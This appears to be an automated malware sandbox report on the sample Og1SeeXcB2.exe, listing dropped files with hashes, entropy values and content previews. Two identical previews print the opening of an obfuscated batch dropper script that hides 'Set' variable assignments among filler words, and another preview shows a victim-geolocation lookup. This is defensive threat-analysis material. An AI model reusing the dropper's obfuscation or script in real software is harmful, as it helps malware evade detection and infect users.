SHA-512: 32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: cXwjp02Fln.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Evo-gen.3763.25878.exe, Detection: malicious
• Filename: l25hnb64Pt.exe, Detection: malicious
• Filename: l25hnb64Pt.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.PWSX-gen.28191.20359.exe, Detection: malicious
• Filename: 3hKak4Fdou.exe, Detection: malicious
• Filename: gaVr0jXXLk.exe, Detection: malicious
Process: C:\Windows\SysWOW64\cmd.exe
File Type: data
Category: dropped
Size (bytes): 226497
Entropy (8bit): 7.99923595029469
Encrypted: true
SSDEEP: 3072:PZIUVcALCJUp3LJF8mngWqvAnslxrGqfvs+3dHNmJTigVf1Z2HTZgDm/DwEcRzJk:PFsiIm9qYsd0+PmMgVfIT2DmspRX9Z3+
MD5: D47CB3F68132F19369656BB4F968C833
SHA1: 51FA6EC2DB958C68463EE45040F8F7207222DD20
SHA-256: FF61738C19939A7408BBF2885B5D9A6EE9201D6BB71E1DB6F4442D976589605D
SHA-512: 7118D378FDC473FE72F8E045CC08F4DC1DDC930F1628C7AA4EA2E77A475C6718F5D5F7BD8399BF3290130DBA5A64D6AF4F0DE5CDE65A9B86F8CEB3FDE1704382
Malicious: false

Process: C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type: data
Category: dropped
Size (bytes): 63488
Entropy (8bit): 6.733333727552087
Encrypted: false
SSDEEP: 1536:L+Sh+I+FrbCyI7P4Cxi8q0vQEcmFdni8yDj:SSAU4CE0Imbi86
MD5: 8DCF0EC428376A2BF753BBFC5D6778AE
SHA1: 2D4647F5C7983425561915D0FD48CE7896AF1038
SHA-256: 4DA04943476417FE8B9DAB26B5B23496A921B3505F405C51D8C6B5F5BA8CE31B
SHA-512: 8EB62AE4DBA92FB7D75FE196C95FF5D1F1B4172B7DAFD55A27DE2CD268ECEFB04EB27D712556E8E4D17A7D5E3D9032D1B7EE0D7ADB643A702F066B78FDAF9DDA
Malicious: false

Process: C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 4.453285244256303
Encrypted: false
SSDEEP: 384:3AkqLyH3PedZlnq166+5n9JboQTcRKjxqol1r7Yvtx4MFAmUEgQPXH:3AGWRqA60dTcR4qYnGfAHE9X
MD5: 7F448B99739213FC83C724547DC384D5
SHA1: FB36B6D68A52E2CB31DA6949E8FBD0C9A3A8D0AA
SHA-256: 9AB1297161E801881BB75276E562E6B91A822DF226A507BE927E102D3706D2CF
SHA-512: 15B2F0636DE847D1BECD116F05B4D0F9F73940D64BFA9C69889B0A57C7C219F9D607CD4CDD04ABCA72D8AA96A116B33A5DBDDA8E6F5F794DEA1306FC54A58379
Malicious: false
Preview: ed by ).unknown POSIX class name.POSIX collating elements are not supported.this version of PCRE is compiled without UTF support.spare error.character value in \x{} or \o{} is too large.invalid condition (?(0).\C not allowed in lookbehind assertion.PCRE does not support \L, \l, \N{name}, \U, or \u.number after (?C is > 255.closing ) for (?C expected.recursive call could loop indefinitely.unrecognized character after (?P.syntax error in subpattern name (missing terminator).two named subpatterns have the same name.invalid UTF-8 string.support for \P, \p, and \X has not been compiled.malformed \P or \p sequence.unknown property name after \P or \p.subpattern name is too long (maximum 32 characters).too many named subpatterns (maximum 10000).repeated subpattern is too long.octal value is greater than \377 in 8-bit non-UTF-8 mode.internal error: overran compiling workspace.internal error: previously-checked referenced subpattern not found.DEFINE group contains more than one branch.repeating

Process: C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type: data
Category: dropped
Size (bytes): 66560
Entropy (8bit): 6.52658061464233
Encrypted: false
SSDEEP: 1536:H1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXEo:HZg5PXPeiR6MKkjGWoUo
MD5: 3091AF9118AE26AD838B8D32F9FD8269
SHA1: 4E0FBFA7F5316E7459F4431842FCEE0433DF385E
SHA-256: D733B28FAE8E531EDF10B4175B00F1A9C333E06DBD950F74980977EB0E17AB8E
SHA-512: 43A24D9C3799C0B4A40B8E144ED13A05D31A92C03CD095EFA9144800865566BBF851EF45AEB67D10A7912480FB0253D4E21B556794A8C19FDAD0317377E73665
Malicious: false

Process: C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 6.408911149183764
Encrypted: false
SSDEEP: 192:xqrayH6BeiGunGEb37wdox4nQL5MHqZoHquOofN:xql8Ga9MrKnofN
MD5: 3845CAE93BF3F8C55BDAA2ACEFFD4742
SHA1: 03B768473C8CC7CBA6A073D79557189F595FF121
SHA-256: DF043072990892E2D5A70B214D924BC2DB03FD838BCA7D8FD283C8E50D31E380
SHA-512: 425F4D21969A0CAADE46856AADC40C285719F838F362499FAA1FA3A39C63AC8AF7FF84AC85D91313EE5BD0E57A8CA389CB1BC64327FFD1BD92732D9BE0F163B2
Malicious: false

Process: C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type: data
Category: dropped
Size (bytes): 45056
Entropy (8bit): 6.705849680669183
Encrypted: false
SSDEEP: 768:d3Uq1oD3OQOcqkLPlHSkQ8cccnauOKlxRUeBQoHdMgwpJrrA4X3gQX/aSXLROHJ6:OUQlHS3cctlxWboHdMJ3RraSXL2Q
MD5: 1F10A9C5618FAF2A6FE60C968E51C785
SHA1: 0BEA51E44DF6AB4331058C82CB7F1DCF0B64895E
SHA-256: 3AD1A2235B6B0DEB7C387329723C4F5CF36C4032977BB5BCCF90A56A90769F60
SHA-512: 532A307DA30F88F68093F6830A592D46E2702B6CC54941DFECDF6161DD77C6BE14F2E23BBA67665B62F86F384707CDCBD714D1C5443756DB15F85B0FB96019F9
Malicious: false

Process: C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type: data
Category: dropped
Size (bytes): 46080
Entropy (8bit): 5.579738863336073
Encrypted: false
SSDEEP: 768:8fzFU4eeGlDfGaVS4Ld728BpTvzdtBtPPXZ7HE+7SWKA3fnh2zYvyGOfOUXwg0:uJUzdlDfFgQa8BpDzdZPp7HE+tKA3QkX
MD5: C59BBDD6E7860F60AC0F5968ABCFECB2
SHA1: 145CFBFC647BF26A04FD0E1A6280BA827A5995CE
SHA-256: 356996ADA99749863FBDF577307BD29288BBB20C6EB3F5BC3985D5055A8B0B74
SHA-512: 388ADE789EE78F8D235FF309507CCE34443C5CDE08C3BB10F6BC8F7FB5952AF613915B464950EED7447DD549E8DECCF72C7FB940500DAF62CDB893465E563DF3
Malicious: false

Process: C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type: data
Category: dropped
Size (bytes): 43008
Entropy (8bit): 5.020060621370147
Encrypted: false
SSDEEP: 384:WehJ06HrpRD9HPmPuki09PrOa3HwwuBcozc/mwftIQXoSpu8888888888888888N:tD9vmPukxhSaAwuXc/mexy
MD5: 597754DC836787DE4BAC9CF2DB5D3E34
SHA1: FE4C82D2A35E26222D58F1CE8F8C95D2091637D7
SHA-256: 511364A6DEE2B2B1524DD4D1EF5D94A3FF70D7A24121EE38EA68E5820ECBA47D
SHA-512: 7A26FECA330D14E237494D1B462C176D4844FF6DC874AF142B77AF7CC7C70B1CB999BBCB2F2BAC18B9250BEFF249459ECF8C69927A44A17B66A0B4714822E342
Malicious: false

Process: C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type: data
Category: dropped
Size (bytes): 49152
Entropy (8bit): 4.696487128896818
Encrypted: false
SSDEEP: 384:m888888NfU84444QnoooooooooooooooooooooooYooootooooooooooooooYooC:iSGc
MD5: 108D75E7972AAA42682547974686163A
SHA1: CC31C1FEB416557F1D4F4647000FDAED7DF6FD5E
SHA-256: 44616AC50FB81013E90D95DF4AF787D0AAA70D8FF6F9B81F83FA4AAA03E9F97E
SHA-512: 1B906DF98EAC64CC107C7837C8294C963A14DFE5E8EA619B35C0CD0C91C5EE78C6DB3B65919A3BBD2A694EA15356EFB490C45BF0EB2294459E457BF2E875F486
Malicious: false
                                                                                                                                                                                                                                Preview:.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.............................................................................................................................................................................................r...................................................................................................................................................................................r.r.r.r.r.r.r.r...............................................k.k.k.k.k.k.k.k.k.................................!.!.............................................................................................................................j.!.!.!.!.!.!.!.!...............................k...........!.r.........!.!.................................................r.r.....r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...j.j.!..................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):63488
                                                                                                                                                                                                                                Entropy (8bit):4.57723913767573
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:wUsFxyLtVSQsbZgar3R/OWel3EYr8qcDP8WBosdq:whxjgarB/5el3EYrDWyuq
                                                                                                                                                                                                                                MD5:A13A0FD9A4EDB4290C8A0265F0DCE304
                                                                                                                                                                                                                                SHA1:A66FE66B666FCE86BCE99E1EED4AE972C67A81CD
                                                                                                                                                                                                                                SHA-256:700FA0779F67665A1C5737DDFED7C0A8AA42CDFDF76D660BB66F944FA47CA295
                                                                                                                                                                                                                                SHA-512:68EF1FAE3162B3E63694A579499C275823F88065481F63BCC065F3C0E656DFBB9060DD145BA55D76CD8B9B8F96FCB5CD225C16F93D00F804F8575553B1B19564
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:..text$np....3'..6....text$x.i'.......text$yd.....(.......text$zy........s....text$zz.............idata$5.............00cfg...........CRT$XCA.............CRT$XCAA............CRT$XCL........(....CRT$XCU.............CRT$XCZ.............CRT$XIA.............CRT$XIAA............CRT$XIAC............CRT$XIC.............CRT$XIZ.............CRT$XLA.............CRT$XLZ.............CRT$XPA.............CRT$XPX.............CRT$XPXA............CRT$XPZ.............CRT$XTA.............CRT$XTZ.... ...`G...rdata... ..P#...rdata$00....C.......rdata$T.....C..x....rdata$r....`E...L...rdata$zz... ...l....rdata$zzzdbg............rtc$IAA.............rtc$IZZ.............rtc$TAA.............rtc$TZZ.............tls.............tls$............tls$ZZZ.............xdata$x........h....idata$2............idata$3.............idata$4.........#...idata$6........p....data...p....9...data$00........(....data$dk00...........data$r.P........data$zz........X....bss....@#.......bss$00..5..`....bss$dk00... 6..l....bss$zz..P.
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1092), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):16911
                                                                                                                                                                                                                                Entropy (8bit):5.042090593897248
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:F0J6J98EveX+xAAPtChULsYFY7VocwlAj/AhbEatP9N:20J2EmRAVHLsYujOEatj
                                                                                                                                                                                                                                MD5:A08DB366FF5035C09967E0E421CF2177
                                                                                                                                                                                                                                SHA1:A0EDEED66CE1CDF044D7B9C169E0D8612A083514
                                                                                                                                                                                                                                SHA-256:42359E3C847A71813923214F4DC3A550ECFC71042339132C599339ECAA72C5C1
                                                                                                                                                                                                                                SHA-512:92E930F777A6D060623703892549AB414BC7A9EF83C633BB9D4F0D7091A375F98ABEDCA74007B325403FD10CBC562708BF80486F6905491A8CB336274A4DC20F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:Set Surrey=w..RKsICamcorders Betty Ray Fleece ..cJfHUses Regime London Residents Surprising ..KYBenefit Levy Latino Luggage Exam Flower Display Apache ..DylpTranslations Usd ..HRTpCustomise Painful Asks Vat Realtor ..urKuJazz Mile Terrible Org Met Harmony Yugoslavia ..aMLExtremely Rest Nathan Novels Shoppingcom ..nTPine ..gTnOrbit Forge Trust Sur ..YnKEEvaluation ..Set Distinction=v..zQPmRealtors ..ifAllergy Davidson Dirty ..QqFBecome Anne Funeral Charter Illustrations Tactics Tabs ..SeqLa Same Destroy Aj Rates Spreading ..POMpAttached Oils Sponsored Olive Publish ..UDvCConclude Italic ..Set Criminal=f..GATiQui Shooting ..ZjWatched Diverse Shops Worked Fcc Sue Tariff Belong Size ..hTCeremony ..iXFMeasure ..bRpSurvive Align Fountain ..QEHValidation Twiki Emotional Occurrence Million ..dEuDFormation Patent Sustained Absorption Possibilities Mil Superior Pda ..Set Tribute=a..AvHInvestigate Special Linear Relocation Ad Increasingly Olive ..ekiGays Restrict Recruiting Volkswagen Gallery ..X
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1092), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):16911
                                                                                                                                                                                                                                Entropy (8bit):5.042090593897248
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:F0J6J98EveX+xAAPtChULsYFY7VocwlAj/AhbEatP9N:20J2EmRAVHLsYujOEatj
                                                                                                                                                                                                                                MD5:A08DB366FF5035C09967E0E421CF2177
                                                                                                                                                                                                                                SHA1:A0EDEED66CE1CDF044D7B9C169E0D8612A083514
                                                                                                                                                                                                                                SHA-256:42359E3C847A71813923214F4DC3A550ECFC71042339132C599339ECAA72C5C1
                                                                                                                                                                                                                                SHA-512:92E930F777A6D060623703892549AB414BC7A9EF83C633BB9D4F0D7091A375F98ABEDCA74007B325403FD10CBC562708BF80486F6905491A8CB336274A4DC20F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:Set Surrey=w..RKsICamcorders Betty Ray Fleece ..cJfHUses Regime London Residents Surprising ..KYBenefit Levy Latino Luggage Exam Flower Display Apache ..DylpTranslations Usd ..HRTpCustomise Painful Asks Vat Realtor ..urKuJazz Mile Terrible Org Met Harmony Yugoslavia ..aMLExtremely Rest Nathan Novels Shoppingcom ..nTPine ..gTnOrbit Forge Trust Sur ..YnKEEvaluation ..Set Distinction=v..zQPmRealtors ..ifAllergy Davidson Dirty ..QqFBecome Anne Funeral Charter Illustrations Tactics Tabs ..SeqLa Same Destroy Aj Rates Spreading ..POMpAttached Oils Sponsored Olive Publish ..UDvCConclude Italic ..Set Criminal=f..GATiQui Shooting ..ZjWatched Diverse Shops Worked Fcc Sue Tariff Belong Size ..hTCeremony ..iXFMeasure ..bRpSurvive Align Fountain ..QEHValidation Twiki Emotional Occurrence Million ..dEuDFormation Patent Sustained Absorption Possibilities Mil Superior Pda ..Set Tribute=a..AvHInvestigate Special Linear Relocation Ad Increasingly Olive ..ekiGays Restrict Recruiting Volkswagen Gallery ..X
                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):931
                                                                                                                                                                                                                                Entropy (8bit):4.986820407325773
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:tklrGndToUGkMyGWKyGXPVGArwY3P+aoHDGdAPORkoao9W7im51w7CN9jF6xIjSz:qlrqdTLauKyGX85y266m7WAxZ9
                                                                                                                                                                                                                                MD5:8FA06A7461C54F3A28161A927387438E
                                                                                                                                                                                                                                SHA1:71FAAF0ABA0FD4B12C7FCA03DC415B9278EAF54E
                                                                                                                                                                                                                                SHA-256:99D5C791E55CC6C937D92BF0708E8DB4F2EF047377C8A9B9B1A015CCC476145E
                                                                                                                                                                                                                                SHA-512:CCDECC6D1D1C2B960D31B676A2676FCE0D7C254361F41FCCD5735179CB81195E2F3E3DE7EC919A5B0098984E9E88866A201245930D59DB07E28B079863CAD0B0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{. "geoplugin_request":"81.181.60.92",. "geoplugin_status":206,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"",. "geoplugin_region":"",. "geoplugin_regionCode":"",. "geoplugin_regionName":"",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"",. "geoplugin_countryCode":"CH",. "geoplugin_countryName":"Switzerland",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"EU",. "geoplugin_continentName":"Europe",. "geoplugin_latitude":"47.1449",. "geoplugin_longitude":"8.1551",. "geoplugin_locationAccuracyRadius":"1000",. "geoplugin_timezone":"Europe\/Zurich",. "geoplugin_currencyCode":"CHF",. "geoplugin_currencySymbol":"CHF",. "geoplugin_currencySymbol_UTF8":"CHF",. "geoplugin_currencyConverter":0.9088.}
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):78017
                                                                                                                                                                                                                                Entropy (8bit):7.997575482101774
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1536:94fiigJXTDf/1Vgf22HTZgDm/HMIwEAZRiiJEHJPOk29qOk4kvrJ5bqOKNh+:9TigVf1Z2HTZgDm/DwEcRzJEBOn9I4s7
                                                                                                                                                                                                                                MD5:B1CA45983AD3737F17571D90105C6812
                                                                                                                                                                                                                                SHA1:E12A927C8577AF34931DF12313498538858145E7
                                                                                                                                                                                                                                SHA-256:C3E207C75F0773306412C63CEDD5465EC8B2A4B75A8B852EC763BA37B6045912
                                                                                                                                                                                                                                SHA-512:EF62485CE5C17824AD95B725CD088E50EFDC1EBCA13F540CD92F8E29286EB42D916805FC3E04F0158F920E3959818115EFF81F8F6BAD8B111DC1E06D5B4C1FC9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.../u.|r..Q..u..&y..T.;........cH....@...H........w#..n..~.p.JB!....$...E............{.H...!....z...W.+_Y. W..q...,...2..b3......Qe....4F..a{ v.....Ti......<.`\fgx..~Ey..C%....C.hRo...;iY_.KV....i....A.5:.}.;..........-......s.{.....;d....-.M.}.!F.u.i.....b ..>..6..1>......D.Lt#....]L.o>P..#...o..U....7.(.=..*....J.W.........}........N.B...$C.......]<.L.H.(...1.x.v~.}..6...../.4Dgp......?.....x...'.O...h..V`.X+..........t:.....i<.>...',......Tk.v...;....v....}......D.Y@......Yt.U.@G.V^...K...~..2\n.f/y.C.x......l....v..jZ.x...%......0.."..."y.O5.by.$.d....%..Y!..O....9...K+$..?.FQ..@c....1.@.......q&.c...S.I..x/N.Q.W...#....$"t...c...?..@L....6.C.U8.`.`.(,..3.lD.2\.J..<t..zT...\.,.7.pru...0(|...\.....W.`=...?...fB~...@......!..Q....!...\'.&%........PJ;.^..[Z.X.{_..-n].7d....>.........k..v..k3e...\.g.....B\k....S...#.....Q...Xf.k..Q..\..II&RA...~.M.-..Ip1-zEHIMf.l.O.....A.7 ..Xj.~ze8.$....!.S+(...!...G7.#..:F.....V..O
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                Entropy (8bit):6.440288771540654
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:nwGI9KgvoA3tnTnb+6h+HMU640L6wy4Za9uVtn3YcyxW2:w/Dde6YF640L6wy4Za9IN3YRj
                                                                                                                                                                                                                                MD5:D5B404D99B165EA552CB83B276DF8345
                                                                                                                                                                                                                                SHA1:AE69F78CD36D0BD0C9BEC3DFC4ED938FA75F8D6A
                                                                                                                                                                                                                                SHA-256:C44F28DF94A7F749DB47B044C0269197D7A71437E7391624A94E801C73CE89E3
                                                                                                                                                                                                                                SHA-512:351929F512A328D101C978079ADCEC5E7694B3CB6713CBCA712F5BE6A3A0103BDDA5E84A794261653A16908D5249D255BA5C79EA2A86C8D871E7EAD490634AD6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:f......3.}.f......3.Cf9.tt.E....f........E.f.......E0P.Q......WV..L......u.Q..<.I.2.M0...._^..[].8........SP.......P.......P.......PQ....I..=.(M..u......f.......U..E(...u......SV.....t...........P.LJ.........E,...u...M ...u.......U$...u.j.Zj.Q.u.RQ.u..u.V.u.hT.I.P.u...6...M.....u.2....=.(M..u.f........^[].(.U..E(...@..S..#E(VW.....P.I....}.3.@P.E,Q.u.@.u$...u ...u.#E,.u.S.u.h..I.PW.t6...u.....u.2..@...t..M.QP....I..E.+E..G`.E.+E.Gdj.....I..FL3.@.=.(M..u.f......_^[..(.U..E(SV...W;.u...........P..I...M,;.u.......} ;.u.......]$;.u......3.3.BRQ.u.SW.u..u.PVhP.L.Q.u..5...M.....u.2..U.U.f92t'RV.5H.I.h....P..E.j.j.h.....0..M.3....=.(M..u.3.Bf......VSW.u..u.P....I.3.@_^[].(.U..$ .......E(SVW.....;.u.j.X.....P.>H...u,..;.u.. ........E(t.....E ;.u.......M$;.u......j.Q.u.QP.u..u.Rh..I.h..L.V.u...4...}.....u.2.......}(.t.j.j.h6...P..H.I......V3.Vh6...P..H.I..E.9.....t.j.VVVVV.7....I........u.5H.I..E.E..E......E.h.(M..E.P......P.=....tf......P.....E(........$..L.P.XO..YY.....
Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type:data
Category:dropped
Size (bytes):35840
Entropy (8bit):5.37936198626836
Encrypted:false
SSDEEP:768:c3CAv2hl6v+L2q0uVGHj9/viMxYWD/gRHM1zzhWE7QxZaR82:sfv2j62SfuVGHj1vtK7h6R8an
MD5:5C0031E49707ADDDAC84958D9FE7D87E
SHA1:3F2707DA8132868FB17FBBFE524B49E3147649DE
SHA-256:A51D5A13DA08DA201CFA532DEC4C75CEE6E4262319181A55068D0602AB601AAA
SHA-512:7EA4EECDCDED1E7DD73A8DD743F1CFDC7EB741AF9E91302D63E9E616DE4ADEC8537F6443DF26B517B97B7E0C140A6B78B387DB43DFC4B3131C98A283758AA211
Malicious:false
Preview:^[..U....S....V.E...E...W.}..E..U.........O....M..W ..tC;.s"....F..E......G;E.t....;.r.}.;.r...V..G....H;E.r....f.F.....;.s.f.....;O r._^[..U..V.r....W............L.........E.,K...........$...I......K.<.t.<.t.<.t.3...3.A3.;M.....X.........K.3..M.;.. cL....+E.....@.4.........K.3.9M.........K.........K.3.B... cL.;.t....t.3.3.;U......;.w=.........rr........... .....................................>... ..r8... ..........' ..v$..) ........../ ..tz.._ ..tr...0..tj......K.3..<. cL.............K.3.B... cL.;...B........9....._.-.........K....@.K....@.;.t...;.s.3.9E......E...3._^].I.6.I.].I...I...I...I...I...I.[.I...I.U..QQSVW.U..0^L..M.3......;.u.R....(..Y..t..U..M....^L.G..F..u..._^[.....U..QQSVW..y........f..toj]...E.\...^.E.[......f;U.u...q.j]Xf;.t.j\Xf;u.u.j]...^.)f;U.u.f9y.t*j[X....j]^...f;.t.f;.u.f9q.t.........f..u.3._^[..3...@..U..SV.u...W.....N.;.r.j..u....u..X'.......t..6..u.3.@_^[].3...SV... ..W.N<.<.;.~...;.}Y..+...d|P..?P......Y..u.j..>.F<..P.v.S.K]...F ...+F....~<....
Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type:data
Category:dropped
Size (bytes):43008
Entropy (8bit):6.503287996555477
Encrypted:false
SSDEEP:768:3NmoKzYkBRR9rlRmLmP/puCYmBLPrpmESmVamFqrxxU8tUYzaDD:ooKzYkBvRmLORuCYm9PrpmESvn+L
MD5:7D24837741341CAE2FF6E128F05C68BC
SHA1:C00D1210FD002ADAB7DCE03C83CCE4372E1272C8
SHA-256:DF71EC9EADEB3ACBB56EF804912ED4D00E2F6D6595835FC9E9AB822DD8D28610
SHA-512:5692138553CFB4E0BAB685F664C896B2ED7D71972424E8E8A55F46A0A74471AAC1F545C547ACA428A2B979FAAF2E1DF675A1B7583F988E36B32DF4102E10D553
Malicious:false
Preview:.\.........3..d.....\......A..d...^.U..E.VW....`.....X.............`...9.`...u..w Pj...X....P........`...._^]...V..`.....t..v Pj...X...."........`....^.U..QQVj....<...YP...,........?.].9M.u..........3.9M....@........^..U..SV....M.Wj.[.~...i....S3.A+...R....u.!..FLjDWP.F..........jD......WP........j._...........u._^[]...U....VW..j....t......O...j..t............j..t.........Xy.....o..y..G..D..;GLu.jDj$X+....P.G.P..........u....a.........t9...t..u..E...y.....L..]..E.....L..3.............?.E..u................?.E..u..E..%.CL._^..V... ..............L..C...^=....|.........U.......SVW.....$....5....u...$....k...3...t.QQ..$.......0.>F;.r._^[..U.........SV...l...W.]..o...h.....K...YP.M.................3.3.W.s.F...3.u...5..h.sL..u..;"..YYQ.....L...P.u.....................T...P..\...P..d...P.E.P.u..G.......E.P......P.4.....d...P......P.._....T...P..\...P..d...P.E.P..L...P.......$..\...P......P._....T...P......P._....................t.j..:....E..3.E...VV.E.P..3...3.E..
Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type:data
Category:dropped
Size (bytes):21481
Entropy (8bit):7.306676250438361
Encrypted:false
SSDEEP:384:lTHwWV8tnwmTihbn929MwO/ChZrzmZGhLdXVaeCVrVEVFJ8ZcGwGBk7/UMQ3rw:pByLiFuO/ChgZ45VatJVEV3GPkjF
MD5:0C55FD3803E15F8ECB82B7BE5B0B60B9
SHA1:36D65A1DF5322C44D19710ADE27D3630D85BB4B5
SHA-256:99AD54E17EB39ACC10F312DEC1C97F3304C9CA7A7AECE9445189C0A289A1E831
SHA-512:32E1370DD0DB29CABCD35B413344FDA56C5EFEF1791DDA9C27D4AD88C90B1A19C31B20D7C5882991DABA2AA03148E20CE68305490F89B42ED67092088F1BE060
Malicious:false
Preview:2R2V2Z2^2b2f2j2n2r2v2z2~2.2.2.5.6.6?7.7!8;8U8o8.:J;Q;|>.>.>.>4?e?r?.?.?.?.?.?.?......0....0.0.010>0I0S0^0.1.1.2.2.2.2.2.2.2.2"2&2*2.22262V2Z2^2b2f2j2n2r2v2E3.3.3C4U4\4.4.4.425}5.5.5.5.6.646?6f6.6.6.6.6.6.6.6O7f7y7.7.7.7.7.7.7.7.8.8.9.9.9.9.9.:':1:?:I:W:^:i:p:{:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.;$;/;6;A;M;U;_;j;t;.;.;.;.<.<#<*<8<B<L<V<b<.<.<.<.<.<.<.=.=.=D=Z=p=.=.=<?G?N?\?g?n?y?.?......x....0.0$0,040<0D0.0.0[1b1.2.2.3.3.3.3.3.3.3.3.5.5.6.6.6.6.:.:$;{;.;.;.<$<V<b<r<.<.<.<.<.<.<.<.<.<.='=1=>=v=|=5>.>...........0.0R1{1.1.1.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3-3Y3a3l3.3.3.4,4.4.4.4.4.4.4.4.4`5.5.5.6i6.6;7z7.7.7.989F9V9b9.:.;.;.;.=4=H=.>.>.?.?~?.?...........0.0=0v0.0.0.0.0.0.1.3.3;4D4N4T4Y4d4i4q4.4.5N5_5.5.5.5.5.6.686Z6l6.6.6.6.6.6C7w7.7.7.7.8.8+828a8.8.8.8.8.8.8.8.9$939:9P9x9.9.9.9.9.9":7:b:n:}:.:.:.:.:.:.:.:.;.;.;.<.<.<8<B<X<^<.<1=J=w=.=.=.=.=.=.=.=.>M>T>c>n>.>.>.?e?l?.?.?.?.?.?.?... .......0\0.0.0.0.1.1)1=1D1[1b1h1.1.1.1.1.1.1.1.1.1.1B2d2.3.3)313b3}3-4L4.4.435^5.5.5.5.696d6.6.6.6"7>7s7.
Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
File Type:data
Category:dropped
Size (bytes):148480
Entropy (8bit):7.998746748115574
Encrypted:true
SSDEEP:3072:PZIUVcALCJUp3LJF8mngWqvAnslxrGqfvs+3dHNmj:PFsiIm9qYsd0+Pmj
MD5:E2EE4C92015ABE2677396216A4FB86AC
SHA1:5ACD947F6C9CC607FECF5CE07929BB9EE9C24658
SHA-256:0A3BA8B374BAB00A7A25CFBC0D362BEC30A85A5C19167050A5902CC01B634C43
SHA-512:A53B4BD82197D1D9C520950A6B0E063C2BB2E95877246781453B3EC15C7D46510580DDC42A8C4E4991E7180037D5A902E195792F58B9A62FF57FDEB61916E55E
Malicious:false
